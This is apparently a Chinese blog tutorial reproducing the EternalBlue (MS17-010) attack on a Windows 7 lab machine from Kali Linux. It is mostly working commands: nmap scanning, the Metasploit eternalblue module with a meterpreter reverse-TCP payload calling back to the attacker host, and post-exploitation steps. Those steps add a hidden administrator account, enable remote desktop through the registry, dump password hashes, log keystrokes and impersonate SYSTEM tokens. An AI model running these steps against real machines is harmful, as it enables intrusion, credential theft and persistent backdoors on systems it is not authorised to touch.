永恒之蓝

windows7 - 永恒之蓝漏洞复现

windows7 - 永恒之蓝漏洞复现

操作教程

windows 7 - 永恒之蓝漏洞复现

  • 查询俩机的ip地址

    kail windows7
    ip 192.168.136.138 192.168.136.137
  • 首先检查windows7的靶机是否脆弱.
    脆弱

    此处一般是kail攻击远程连接不成功的排查点
    1.靶机防火墙是否关闭

    2.通过控制面板的系统与安全中远程控制是否打开

    3.检查系统补丁是否更新,如果有系统安全补丁将其卸载,(如果不确定的话,选择无脑全部卸载)

  • 通过使用nmap扫描虚拟机查看开启状态和其他信息,查看ip后发现端口处于开启状态

  • 使用kail与window7进行ping网段,查看是否有数据连通

  • ping通后,打开kail的数据库,使用以下指令。

    • service postgresql status //查看数据库开启状态
    • service postgresql start //开启数据库
    • service postgresql status //再次查看数据库开启状态,确认开启
  • 将数据库进行初始化

    • msfdb init
  • 启动msfconsole

    msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如nmap、sqlmap等,可以直接在msfconsole里面使用。

  • 搜索ms17_010漏洞(永恒之蓝漏洞)

    • search ms17_010
  • 选择扫描模块,进行探测是否成功

    use auxiliary/scanner/smb/smb_ms17_010

  • 查看要设置的参数

    show options

    • 首先运行查看是否运行,如果不能运行就需要进行设置
  • 此时需要进行设置rhosts与rport参数

    • rhosts(靶机ip) rport(端口号)
  • 验证存在漏洞之后,就可以利用永恒之蓝漏洞,使用其中的渗透攻击(exploit)模块,对其进行渗 透攻击 选择模块exploit/windows/smb/ms17_010_eternalblue 配置模块 发动攻击

    use exploit/windows/smb/ms17_010_eternalblue

    • 首先options查看参数

    //设置扫描的靶机ip
    set rhost 192.168.136.137
    //设置携带的攻击载荷
    set payload windows/x64/meterpreter/reverse_tcp
    //设置监听的攻击机
    set lhost 192.168.136.138

  • 最后启动利用exploit进行攻击,成功渗透

  • 渗透成功后一些常用操作
    通过Shell对靶机Win7进行控制
    创建用户名密码
    net user hack 123456 /add
    将用户hack添加入管理组
    net localgroup administrators hack /add
    开启远程桌面功能
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Kali远程桌面连接Win7
    rdesktop 192.168.2.22
    ————————————————

  • 当利用渗透后的权限进行shell交互显示乱码是因为编码不同,以下指令即可实现

    chcp 65001

  • 获取到session后的常用命令:

    help #获取所有可用命令

    getuid #获取当前权限

    screenshot #截屏

    hashdump #获取密码的hash

    ps #获取进程列表

    sysinfo #获取系统信息

    route #获取路由表

    getpid #获取当前攻入的进程pid

    migrate #将当前后门注入迁移到其他程序

    keyscan_start # 开启键盘记录

    keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

    download/upload #上传下载文件

    keyscan_stop # 监视键盘记录

    bg # 回到metasploit界面

    令牌操纵
    use incognito #heip incognito 查看帮助

    list_tokens -u 查看可用的token

    impersonate_token “伪造的身份” #假冒token 或者

    举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用
    execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell


永恒之蓝
http://example.com/2023/02/21/永恒之蓝/
作者
发布于
2023年2月21日
许可协议